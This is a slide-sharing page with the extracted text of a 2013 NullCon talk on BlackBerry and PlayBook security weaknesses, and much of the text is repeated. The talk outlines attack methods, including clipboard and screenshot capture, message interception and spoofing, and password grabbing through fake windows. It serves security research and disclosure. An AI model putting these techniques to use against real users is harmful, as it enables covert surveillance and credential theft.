YURY_CHEMERKIN__NullCon_2013_Conference.pdf
YuryChemerkin
8 views
28 slides
Jul 26, 2024
Slide 1 of 28
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
About This Presentation
This PDF is a presentation by Yury Chemerkin at NullCon 2013, titled "State-of-Art of Mobile Forensics". It explores advanced techniques in mobile forensics, focusing on the security and vulnerabilities of mobile devices, particularly BlackBerry smartphones and PlayBook tablets. The presen...
Slide Content
SECURITY EVALUATION OR ESCAPING
FROM "VULNERABILITY PRISON"
Ph.D. YURY CHEMERKIN
NULLCON ‘GOA ‘2013
FROM "VULNERABILITY PRISON"
Ph.D. YURY CHEMERKIN
NULLCON ‘GOA ‘2013
THE SECURITYIS THE CORNERSTONE
A POWERFUL HIGH LEVEL INTEGRATION
IMs, SOCIAL NETWORKS
FINANCIAL DATA AND ETC.
THE BLACKBERRY WAS BUILT
FREE OF MALWARE & HARMFUL ACTIONS
WITH NATIVE SECURITY SOLUTIONS
MAINLY FOCUSED ON ENTERPRISE
WIDE RANGE IT POLICYSET
UP TO 500UNITS
A FEW THIRD PARTY SECURITY SOLUTIONS
A SIMPLIFICATIONOF THE SECURITYVISION
POOR INTERGRATION (ONLY BLACKBERRY BRIDGE)
NO BUILT IMs, HTML5 & WEB-LAUNCHER
NO WALLETS OR ELSE BUILT APPLICATIONS
PLAYBOOK MIGHT
PRODUCE FEW VALUE DATA DUE APIs
NOT MORE THAN LARGE PHONE’S SCREEN
TOTALLY FOCUSED ON ENTERPRISE
IT POLICYEXTRA REDUCED
UP TO 10UNITS
ENTERTAINMENT APPLICATIONS ONLY
BLACKBERRY SECURITY ENVIRONMENT
BLACKBERRY SMARTPHONE WAS SECURE…PLAYBOOK HAS COME WITH A POOR ENVIROMENT
A POWERFUL HIGH LEVEL INTEGRATION
IMs, SOCIAL NETWORKS
FINANCIAL DATA AND ETC.
THE BLACKBERRY WAS BUILT
FREE OF MALWARE & HARMFUL ACTIONS
WITH NATIVE SECURITY SOLUTIONS
MAINLY FOCUSED ON ENTERPRISE
WIDE RANGE IT POLICYSET
UP TO 500UNITS
A FEW THIRD PARTY SECURITY SOLUTIONS
A SIMPLIFICATIONOF THE SECURITYVISION
POOR INTERGRATION (ONLY BLACKBERRY BRIDGE)
NO BUILT IMs, HTML5 & WEB-LAUNCHER
NO WALLETS OR ELSE BUILT APPLICATIONS
PLAYBOOK MIGHT
PRODUCE FEW VALUE DATA DUE APIs
NOT MORE THAN LARGE PHONE’S SCREEN
TOTALLY FOCUSED ON ENTERPRISE
IT POLICYEXTRA REDUCED
UP TO 10UNITS
ENTERTAINMENT APPLICATIONS ONLY
BLACKBERRY SECURITY ENVIRONMENT
BLACKBERRY SMARTPHONE WAS SECURE…PLAYBOOK HAS COME WITH A POOR ENVIROMENT
A LOT OF TYPES
BOOTKITS
FIRMWARE
USER-MODE
KERNEL
HYPERVISOR
SIMILAR TO THE SPYWARE
BUNDLING WITH DESIRABLE SOFTWARE
WIDESPREADING, EASY DITRIBUTION AND QUITE
RELEVANT FOR HACKERS
BASED ON:
VENDOR-SUPPLIED EXTENSIONS
THIRD PARTY PLUGINS
PUBLIC INTERFACES
INTERCEPTION OF SYSTEMS MESSAGES
EXPLOITATION OF SECURITY
VULNERABILITIES
HOOKING AND PATCHING OF APIs
METHODS
USER MODE ROOTKIT AND SPYWARE
MALWARE BOUNDS BECOME UNCLEAR…HACKERS ARE INTERESTED IN CHEAPER COSTING
BOOTKITS
FIRMWARE
USER-MODE
KERNEL
HYPERVISOR
SIMILAR TO THE SPYWARE
BUNDLING WITH DESIRABLE SOFTWARE
WIDESPREADING, EASY DITRIBUTION AND QUITE
RELEVANT FOR HACKERS
BASED ON:
VENDOR-SUPPLIED EXTENSIONS
THIRD PARTY PLUGINS
PUBLIC INTERFACES
INTERCEPTION OF SYSTEMS MESSAGES
EXPLOITATION OF SECURITY
VULNERABILITIES
HOOKING AND PATCHING OF APIs
METHODS
USER MODE ROOTKIT AND SPYWARE
MALWARE BOUNDS BECOME UNCLEAR…HACKERS ARE INTERESTED IN CHEAPER COSTING
VIA THE BUILT (INTERNAL) EXPLORER
AFTER ENTERING THE PASSWORD BUT STILL
THE INTERNALEXPLORER
FOR EXECUTING MALWARE FROM THE DEVICE
BY CLICKING FILE (.JAR/.JAD + .COD)
TO ALLOW COPYING THE MALWARETO THE
DEVICE AS AN EXTERNAL DRIVE (LIKE A WORM)
ALL DATA ACCESSIBLE EXCEPT APP & SYSTEM
DATA WITHOUT ANY API & OTHER INFO
AFTER MOUNTING AS AN EXTERNAL DRIVE(-S)
AFTER ENTERING THE PASSWORD BUT IT IS
NOTNECESSARYTO USE INTERNAL EXPLORER
TO PREVENT FROM EXECUTING ANYTHING
OUTSIDE APPWORLD (.BAR)
MALWAREIS A PERSONAL APPLICATION
SUBTYPE IN TERMS OF RIM’s SECURITY
SANDBOX PROTECTS ONLY APP DATA, WHILE
USER DATA STORED IN SHARED FOLDERS
THE FILE SYSTEM ISSUES
BB OS v4–5 WAS ACCESSIBLE BB OS V6–7 PLUS PLAYBOOK ARE ACCESSIBLE
AFTER ENTERING THE PASSWORD BUT STILL
THE INTERNALEXPLORER
FOR EXECUTING MALWARE FROM THE DEVICE
BY CLICKING FILE (.JAR/.JAD + .COD)
TO ALLOW COPYING THE MALWARETO THE
DEVICE AS AN EXTERNAL DRIVE (LIKE A WORM)
ALL DATA ACCESSIBLE EXCEPT APP & SYSTEM
DATA WITHOUT ANY API & OTHER INFO
AFTER MOUNTING AS AN EXTERNAL DRIVE(-S)
AFTER ENTERING THE PASSWORD BUT IT IS
NOTNECESSARYTO USE INTERNAL EXPLORER
TO PREVENT FROM EXECUTING ANYTHING
OUTSIDE APPWORLD (.BAR)
MALWAREIS A PERSONAL APPLICATION
SUBTYPE IN TERMS OF RIM’s SECURITY
SANDBOX PROTECTS ONLY APP DATA, WHILE
USER DATA STORED IN SHARED FOLDERS
THE FILE SYSTEM ISSUES
BB OS v4–5 WAS ACCESSIBLE BB OS V6–7 PLUS PLAYBOOK ARE ACCESSIBLE
THE “UPGRADE” FEATURE MEANS
THE INSTALL & REMOVE ACTIONS AT LEAST
AN APPLICATION ID REQUIREMENT
AN ACCESSIBLE RUNNING APPLICATION LIST
HANDLING ANOTHER APPs SILENTLY VIA API
HANDLING ANOTHER APPLICATION SILENTLY VIA
PC TOOLS
MAY NEED A PASSWORD
DEBUG MODE IS FOR TRACING &
DEBUGING ONLY
EASY TRACKING THE NEWCOMING .COD
MODULES FOR THE MALWARE PAYLOAD
THE “UPGRADE” MEANS AN USER INTERACTION
WITH APPWORLD
WITH HOME SCREEN
THERE ARE SOME APIs BUT DISABLED
THERE IS NO API FOR SUCH ACTIONS YET
HANDLING ANOTHER APPLICATION SILENTLY VIA
PC TOOLS
MAY NEED A PASSWORD
STRONGLY NEED ACTIVATED A DEBUG
MODE
LOOKS LIKE MORE SECURE THAN BLACKBERRY BUT
DIFFICULT TO REMOVE DISTRIBUTED MALWARE
THE APPLICATION MANAGEMENT ISSUES
BLACKBERRY SMARTPHONE (LESS THAN BB 10)BLACKBERRY PLAYBOOK (PROBABLY BLACKBERRY 10)
THE INSTALL & REMOVE ACTIONS AT LEAST
AN APPLICATION ID REQUIREMENT
AN ACCESSIBLE RUNNING APPLICATION LIST
HANDLING ANOTHER APPs SILENTLY VIA API
HANDLING ANOTHER APPLICATION SILENTLY VIA
PC TOOLS
MAY NEED A PASSWORD
DEBUG MODE IS FOR TRACING &
DEBUGING ONLY
EASY TRACKING THE NEWCOMING .COD
MODULES FOR THE MALWARE PAYLOAD
THE “UPGRADE” MEANS AN USER INTERACTION
WITH APPWORLD
WITH HOME SCREEN
THERE ARE SOME APIs BUT DISABLED
THERE IS NO API FOR SUCH ACTIONS YET
HANDLING ANOTHER APPLICATION SILENTLY VIA
PC TOOLS
MAY NEED A PASSWORD
STRONGLY NEED ACTIVATED A DEBUG
MODE
LOOKS LIKE MORE SECURE THAN BLACKBERRY BUT
DIFFICULT TO REMOVE DISTRIBUTED MALWARE
THE APPLICATION MANAGEMENT ISSUES
BLACKBERRY SMARTPHONE (LESS THAN BB 10)BLACKBERRY PLAYBOOK (PROBABLY BLACKBERRY 10)
HOW TO REVEALTHE DATAIN REAL TIME
GETCLIPBOARD()
ANY PROTECTION
NATIVE WALLETS RESTRICTTHE CLIPBOARD
ACCESS BY RETURNING “NULL”
WHILETHE APPLICATION ISACTIVE(ON
TOP OF SCREEN STACK) ONLY
DOES NOT WORK IN MINIMIZED STATE
HOW TO REVEAL THE DATA IN REALTIME
GETDATA()
ANY PROTECTION
NO NATIVE WALLET APPLICATION
MANAGING THE LAST CLIPBOARD DATA VIA
SHARED FOLDER
PLAIN TEXT
HTML
ETC.
THE CLIPBOARD ISSUES
BLACKBERRY SMARTPHONE BLACKBERRY PLAYBOOK
GETCLIPBOARD()
ANY PROTECTION
NATIVE WALLETS RESTRICTTHE CLIPBOARD
ACCESS BY RETURNING “NULL”
WHILETHE APPLICATION ISACTIVE(ON
TOP OF SCREEN STACK) ONLY
DOES NOT WORK IN MINIMIZED STATE
HOW TO REVEAL THE DATA IN REALTIME
GETDATA()
ANY PROTECTION
NO NATIVE WALLET APPLICATION
MANAGING THE LAST CLIPBOARD DATA VIA
SHARED FOLDER
PLAIN TEXT
HTML
ETC.
THE CLIPBOARD ISSUES
BLACKBERRY SMARTPHONE BLACKBERRY PLAYBOOK
SCREEN PROTECTION VIA SWITCHING
PERMIT
RESTRICT
ADDITIONALLY PER APPLICATION….
BUT DOES NOT HANDLE WINDOWs
HANDLE WITH THE KEY PREVIEW DUE THE
VIRTUAL KEYBOARD
MAY BE IMPROVED BY XOR’ingTWO
PHOTOSCREENS TO GET THEDIFFERENCE
MASKINGTHE ASTERISKS TAKES A DELAY
ENOUGH TO STEAL THE TEXT
MAY BE PART OF OCR ENGINES
ONLINE OR DESKTOP
RECOGNIZE TYPED DATA VERY QUICKLY
WAS TESTED ON ABBYY ONLINE OCR
SUBSTITUTE FOR HARDWARE KEYLLOGER
RUNNING DOWN THE BATTERRY MORE SLOWLY
THANPHOTO/VIDEO CAMERA
EASY ACCESS TO ANY APPLICATION…WALLET EVEN
NO RESTRICTION LIKE THE CLIPBOARD “NULL”
SCREENSHOTS OFTEN STORE IN CAMERA FOLDER
THE SAME A FILE ACCESS
THE PHOTOSCREEN ISSUES
ARE AVAILABLE FOR ALL BLACKBERRY DEVICES BUT DISABLED FOR PLAYBOOK AND BLACKBERRY 10 YET
PERMIT
RESTRICT
ADDITIONALLY PER APPLICATION….
BUT DOES NOT HANDLE WINDOWs
HANDLE WITH THE KEY PREVIEW DUE THE
VIRTUAL KEYBOARD
MAY BE IMPROVED BY XOR’ingTWO
PHOTOSCREENS TO GET THEDIFFERENCE
MASKINGTHE ASTERISKS TAKES A DELAY
ENOUGH TO STEAL THE TEXT
MAY BE PART OF OCR ENGINES
ONLINE OR DESKTOP
RECOGNIZE TYPED DATA VERY QUICKLY
WAS TESTED ON ABBYY ONLINE OCR
SUBSTITUTE FOR HARDWARE KEYLLOGER
RUNNING DOWN THE BATTERRY MORE SLOWLY
THANPHOTO/VIDEO CAMERA
EASY ACCESS TO ANY APPLICATION…WALLET EVEN
NO RESTRICTION LIKE THE CLIPBOARD “NULL”
SCREENSHOTS OFTEN STORE IN CAMERA FOLDER
THE SAME A FILE ACCESS
THE PHOTOSCREEN ISSUES
ARE AVAILABLE FOR ALL BLACKBERRY DEVICES BUT DISABLED FOR PLAYBOOK AND BLACKBERRY 10 YET
USING AUTHORIZED API TO INTERCEPT
MESSAGES (BBM, EMAIL, PIN-TO-PIN)
CREATE THE MESSAGE
READ THE MESSAGE
DELETE THE MESSAGE
SET THE MESSAGE STATUS (UNREAD,
SENT, ANY ERROR STATE, ETC.)
THE BUTTON EVENTS (THE SAME TYPES)
OPENING THE MESSAGE
FORWARDING THE MESSAGE
SENDING THE MESSAGE
INTERCEPTING THE SMS (BASICALLY)
RECEIVING AND SENDING EVENTS
DELETING THE SENT & RECEIVED SMS
ENOUGH TO HANDLE SOCIAL C&C SMS
OUTCOMING SMS (ADVANCED)
BLOCKING (DROPPING) THE SMS
A NOTIFICATION IN THE MESSAGE THREAD
SPOOFING
THE RECEPIENT
THE BODY
TRANSMISSION REFUSED BY … IF
SUCH MESSAGE WAS NOT REMOVED
THE MESSAGES ISSUES
AVAILABLE ON THE BB DEVICESPROBABLY ON THE BLACKBERRY 10 NO 3G, NO API FOR PLAYBOOK
MESSAGES (BBM, EMAIL, PIN-TO-PIN)
CREATE THE MESSAGE
READ THE MESSAGE
DELETE THE MESSAGE
SET THE MESSAGE STATUS (UNREAD,
SENT, ANY ERROR STATE, ETC.)
THE BUTTON EVENTS (THE SAME TYPES)
OPENING THE MESSAGE
FORWARDING THE MESSAGE
SENDING THE MESSAGE
INTERCEPTING THE SMS (BASICALLY)
RECEIVING AND SENDING EVENTS
DELETING THE SENT & RECEIVED SMS
ENOUGH TO HANDLE SOCIAL C&C SMS
OUTCOMING SMS (ADVANCED)
BLOCKING (DROPPING) THE SMS
A NOTIFICATION IN THE MESSAGE THREAD
SPOOFING
THE RECEPIENT
THE BODY
TRANSMISSION REFUSED BY … IF
SUCH MESSAGE WAS NOT REMOVED
THE MESSAGES ISSUES
AVAILABLE ON THE BB DEVICESPROBABLY ON THE BLACKBERRY 10 NO 3G, NO API FOR PLAYBOOK
THE PASSWORD PROTECTION COVERS
DEVICE LOCKING & ENCRYPTION FEATURE
APPWORLD REQUEST
LIMITED BY 5/10 ATTEMPTS & WIPE THEN
WIPING THE INTERNAL STORAGE ONLY
EXTRACTING THE PASSWORD TRHOUGHT
ELCOMSOFT PRODUCT (CUSTOM CASE)
GUIVULNERABILITY
CREATING THE FAKE WINDOW ON
DESKTOP SYNCHRONIZATION
BREAKING INTO BBDESKTOP SOFTWARE
HANDLING DESKTOP SOFTWARE VULNERABILITY
UNMASKING THE FIELD
GRABBINGTHE PASSWORD
MASKING THE FIELD
DELAY TAKES NOT MORE THAN 15 MSEC
AFFECTED PASSWORD TYPES
THE DEVICE PASSWORD
THE BACKUP PASSWORD
AFFECTED DEVICES
BLACKBERRY4-7(BB 10HIGHLY PROBABLY)
BLACKBERRY PLAYBOOK
THE DEVICE PASSWORD ISSUES
FOR THE BLACKBERRY 4–7 DUE THE INTERNAL CASEFOR ALL DEVICES DUE IN THE DESKTOP ACCESS CASE
DEVICE LOCKING & ENCRYPTION FEATURE
APPWORLD REQUEST
LIMITED BY 5/10 ATTEMPTS & WIPE THEN
WIPING THE INTERNAL STORAGE ONLY
EXTRACTING THE PASSWORD TRHOUGHT
ELCOMSOFT PRODUCT (CUSTOM CASE)
GUIVULNERABILITY
CREATING THE FAKE WINDOW ON
DESKTOP SYNCHRONIZATION
BREAKING INTO BBDESKTOP SOFTWARE
HANDLING DESKTOP SOFTWARE VULNERABILITY
UNMASKING THE FIELD
GRABBINGTHE PASSWORD
MASKING THE FIELD
DELAY TAKES NOT MORE THAN 15 MSEC
AFFECTED PASSWORD TYPES
THE DEVICE PASSWORD
THE BACKUP PASSWORD
AFFECTED DEVICES
BLACKBERRY4-7(BB 10HIGHLY PROBABLY)
BLACKBERRY PLAYBOOK
THE DEVICE PASSWORD ISSUES
FOR THE BLACKBERRY 4–7 DUE THE INTERNAL CASEFOR ALL DEVICES DUE IN THE DESKTOP ACCESS CASE
INITIALLY BASED ON AUTHORIZED API COVERED
ALLPHYSICAL & NAVIGATION BUTTONS
TYPING THE TEXTUAL DATA
AFFECT ALL NATIVE & THIRD PARTY APPs
SECONDARY BASED ON ADDING THE MENU ITEMS
INTO THE GLOBAL MENU
INTO THE “SEND VIA” MENU
AFFECT ALL NATIVE APPLICATIONS
NATIVE APPLICATIONS ARE DEVELOPED BY RIM
BLACKBERRY WALLETS, MESSAGES,
SETTINGS, FACEBOOK, TWITTER,…
BBM/GTALK/YAHOO/WINDOWS IMs,…
GUI EXPLOITATION HANDLES WITH
REDRAWING THE SCREENS
ADDING NEW GUI OBJECTS
CHANGING THEIR PROPERTIES
GRABBING THE TEXT FROM THE
ANY FIELDs (INCL. PASSWORD FIELD)
UNLOCK THE DEVICE’s FIELD
SETTING UP THE PASSWORD’s FIELD
ADDING, REMOVING THE FIELD DATA
ORIGINALDATAIS INACCESSIBLE BUT NOT
AFFECTED
GUI OBJECTS SHUFFLING IS NOT POSSIBLE
THE GUI EXPLOITATION
CONSEQUENCE OF WIDE INTERGRATION FEATURES OFFERED FOR DEVELOPERS (BLACKBERRY 4–7 ONLY)
ALLPHYSICAL & NAVIGATION BUTTONS
TYPING THE TEXTUAL DATA
AFFECT ALL NATIVE & THIRD PARTY APPs
SECONDARY BASED ON ADDING THE MENU ITEMS
INTO THE GLOBAL MENU
INTO THE “SEND VIA” MENU
AFFECT ALL NATIVE APPLICATIONS
NATIVE APPLICATIONS ARE DEVELOPED BY RIM
BLACKBERRY WALLETS, MESSAGES,
SETTINGS, FACEBOOK, TWITTER,…
BBM/GTALK/YAHOO/WINDOWS IMs,…
GUI EXPLOITATION HANDLES WITH
REDRAWING THE SCREENS
ADDING NEW GUI OBJECTS
CHANGING THEIR PROPERTIES
GRABBING THE TEXT FROM THE
ANY FIELDs (INCL. PASSWORD FIELD)
UNLOCK THE DEVICE’s FIELD
SETTING UP THE PASSWORD’s FIELD
ADDING, REMOVING THE FIELD DATA
ORIGINALDATAIS INACCESSIBLE BUT NOT
AFFECTED
GUI OBJECTS SHUFFLING IS NOT POSSIBLE
THE GUI EXPLOITATION
CONSEQUENCE OF WIDE INTERGRATION FEATURES OFFERED FOR DEVELOPERS (BLACKBERRY 4–7 ONLY)
KASPERSKY MOBILE SECURITY PROVIDES
FIREWALL, WIPE, BLOCK, INFO FEATURES
NO PROTECTION FROM REMOVING.CODs
NO PROTECTION UNDER SIMULATOR
EXAMING THE TRAFFIC, BEHAVIOUR
SHOULD CHECK API “IS SIMULATOR”
SMS MANAGEMENT (“QUITE” SECRET SMS)
PASSWORDIS FOUR–SIXTEEN DIGITS SET
…AND CAN BE MODIFIED IN REAL-TIME
SMSIS A HALF A HASH VALUE OF GOST R
34.11-94
IMPLEMENTATION USES TEST CRYPTO
VALUES AND NO SALT
TABLES (VALUEHASH) ARE EASY BUILT
OUTCOMING SMS CAN BE SPOOFED
WITHOUT ANY NOTIFICATION
OUTCOMING SMS CAN BLOCK OR WIPE
THE SAME DEVICE OR ANOTHER DEVICE
McAfee MOBILE SECURITY PROVIDES
FIREWALL, WIPE, BLOCK, INFO FEATURES
NO PROTECTION FROM REMOVING.CODs
NO PROTECTION UNDER SIMULATOR
EXAMING THE TRAFFIC, BEHAVIOUR
SHOULD CHECK API “IS SIMULATOR”
WEB MANAGEMENT CONSOLE
DIFFICULT TO BREAK SMS C&C
THE THIRD PARTY EXPLOITATION
THERE ARE A FEW OF THEM THEY MIGHT HAVE AN EXPLOIT BUT RUIN NATIVE A SECURITY
FIREWALL, WIPE, BLOCK, INFO FEATURES
NO PROTECTION FROM REMOVING.CODs
NO PROTECTION UNDER SIMULATOR
EXAMING THE TRAFFIC, BEHAVIOUR
SHOULD CHECK API “IS SIMULATOR”
SMS MANAGEMENT (“QUITE” SECRET SMS)
PASSWORDIS FOUR–SIXTEEN DIGITS SET
…AND CAN BE MODIFIED IN REAL-TIME
SMSIS A HALF A HASH VALUE OF GOST R
34.11-94
IMPLEMENTATION USES TEST CRYPTO
VALUES AND NO SALT
TABLES (VALUEHASH) ARE EASY BUILT
OUTCOMING SMS CAN BE SPOOFED
WITHOUT ANY NOTIFICATION
OUTCOMING SMS CAN BLOCK OR WIPE
THE SAME DEVICE OR ANOTHER DEVICE
McAfee MOBILE SECURITY PROVIDES
FIREWALL, WIPE, BLOCK, INFO FEATURES
NO PROTECTION FROM REMOVING.CODs
NO PROTECTION UNDER SIMULATOR
EXAMING THE TRAFFIC, BEHAVIOUR
SHOULD CHECK API “IS SIMULATOR”
WEB MANAGEMENT CONSOLE
DIFFICULT TO BREAK SMS C&C
THE THIRD PARTY EXPLOITATION
THERE ARE A FEW OF THEM THEY MIGHT HAVE AN EXPLOIT BUT RUIN NATIVE A SECURITY
DENIAL OF SERVICE
REPLACING/REMOVING EXEC FILES
DOS’ingEVENTs, NOISING FIELDS
GUI INTERCEPT
INFORMATION DISCLOSURE
CLIPBOARD, SCREEN CAPTURE
GUI INTERCEPT
DUMPING .COD FILES, SHARED FILES
MITM (INTERCEPTION / SPOOFING)
MESSAGES
GUI INTERCEPT, THIRD PARTY APPs
FAKE WINDOW/CLICKJACKING
GENERAL PERMISSIONS
INSTEAD OF SPECIFIC SUB-PERMISSIONS
A FEW NOTIFICATION/EVENT LOGs FOR USER
BUILT PER APPLICATION INSTEAD OF APP SCREENs
CONCRETE PERMISSIONS
BUT COMBINEDINTO GENERAL PERMISSION
A SCREENSHOT PERMISSION IS PART OF THE
CAMERA
GENERAL PERMISSIONS
INSTEAD OF SPECIFIC SUB-PERMISSIONS
A FEW NOTIFICATION/EVENT LOGs FOR USER
BUILT PER APPLICATION INSTEAD OF APP SCREENs
THE PERMISSIONS
PRIVILEGED GENERAL PERMISSIONSOWN APPs, NATIVE & 3
RD
PARTY APPs FEATURES
REPLACING/REMOVING EXEC FILES
DOS’ingEVENTs, NOISING FIELDS
GUI INTERCEPT
INFORMATION DISCLOSURE
CLIPBOARD, SCREEN CAPTURE
GUI INTERCEPT
DUMPING .COD FILES, SHARED FILES
MITM (INTERCEPTION / SPOOFING)
MESSAGES
GUI INTERCEPT, THIRD PARTY APPs
FAKE WINDOW/CLICKJACKING
GENERAL PERMISSIONS
INSTEAD OF SPECIFIC SUB-PERMISSIONS
A FEW NOTIFICATION/EVENT LOGs FOR USER
BUILT PER APPLICATION INSTEAD OF APP SCREENs
CONCRETE PERMISSIONS
BUT COMBINEDINTO GENERAL PERMISSION
A SCREENSHOT PERMISSION IS PART OF THE
CAMERA
GENERAL PERMISSIONS
INSTEAD OF SPECIFIC SUB-PERMISSIONS
A FEW NOTIFICATION/EVENT LOGs FOR USER
BUILT PER APPLICATION INSTEAD OF APP SCREENs
THE PERMISSIONS
PRIVILEGED GENERAL PERMISSIONSOWN APPs, NATIVE & 3
RD
PARTY APPs FEATURES
SIMPLIFICATIONAND REDUCINGSECURITY CONTROLS
MANY GENERALPERMISSIONS AND COMBINEDINTO EACH OTHER
NOLOGs ACTIVITY FOR SUB-PERMISSIONS TO PROVE THE TRANSPARENCY
ANY SECURITY VULNERABILITY ARE ONLY FIXEDBY ENTIRELY NEWAND DIFFERENT OS/ KERNEL
A FEW PERMISSIONs ARE CLOSED TO THE USER ACTIONS
THE SANDBOX PROTECT ONLY APPLICATION DATA
USERS HAVE TO STORE THEIR DATA INTO SHARED FOLDERS OR EXTERNAL STORAGE
APPLICATIONS CONTINUE STORE DATA IN PUBLIC FOLDERs BECAUSE GOVERNED BY CHANCE OF AVAILABILITY
MITM / INTERCEPTION ACTIONS ARE OFTEN SILENTLY
THE NATIVE SPOOFING AND INTERCEPTION FEATURES
BLACKBERRY ENTERPRISE SOLUTION / BLACKBERRY MOBILE FUSION IS NOT EFFECTIVE MUCH
THE BEST SECURITY (PERMISSIONS) RULED BY AMAZON WEB SERVICES
PERMISSIONS SHOULD RELY ON THE DIFFERENT USEFUL CASES SET INSTEAD OF SPECIFIC PERMISSION LIST
CONCLUSION
THE VENDOR SECURITY VISIONHAS NOTHING WITH REALITYAGGRAVATED BY SIMPLICITY
MANY GENERALPERMISSIONS AND COMBINEDINTO EACH OTHER
NOLOGs ACTIVITY FOR SUB-PERMISSIONS TO PROVE THE TRANSPARENCY
ANY SECURITY VULNERABILITY ARE ONLY FIXEDBY ENTIRELY NEWAND DIFFERENT OS/ KERNEL
A FEW PERMISSIONs ARE CLOSED TO THE USER ACTIONS
THE SANDBOX PROTECT ONLY APPLICATION DATA
USERS HAVE TO STORE THEIR DATA INTO SHARED FOLDERS OR EXTERNAL STORAGE
APPLICATIONS CONTINUE STORE DATA IN PUBLIC FOLDERs BECAUSE GOVERNED BY CHANCE OF AVAILABILITY
MITM / INTERCEPTION ACTIONS ARE OFTEN SILENTLY
THE NATIVE SPOOFING AND INTERCEPTION FEATURES
BLACKBERRY ENTERPRISE SOLUTION / BLACKBERRY MOBILE FUSION IS NOT EFFECTIVE MUCH
THE BEST SECURITY (PERMISSIONS) RULED BY AMAZON WEB SERVICES
PERMISSIONS SHOULD RELY ON THE DIFFERENT USEFUL CASES SET INSTEAD OF SPECIFIC PERMISSION LIST
CONCLUSION
THE VENDOR SECURITY VISIONHAS NOTHING WITH REALITYAGGRAVATED BY SIMPLICITY
THANK YOU
YURY CHEMERKIN
YURY CHEMERKIN
Categories
GeneralDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 8
- Slides 28
- Age 494 days
Related Slideshows
22
Pray For The Peace Of Jerusalem and You Will Prosper
RodolfoMoralesMarcuc
30 views
26
Don_t_Waste_Your_Life_God.....powerpoint
chalobrido8
32 views
31
VILLASUR_FACTORS_TO_CONSIDER_IN_PLATING_SALAD_10-13.pdf
JaiJai148317
30 views
14
Fertility awareness methods for women in the society
Isaiah47
29 views
35
Chapter 5 Arithmetic Functions Computer Organisation and Architecture
RitikSharma297999
26 views
5
syakira bhasa inggris (1) (1).pptx.......
ourcommunity56
28 views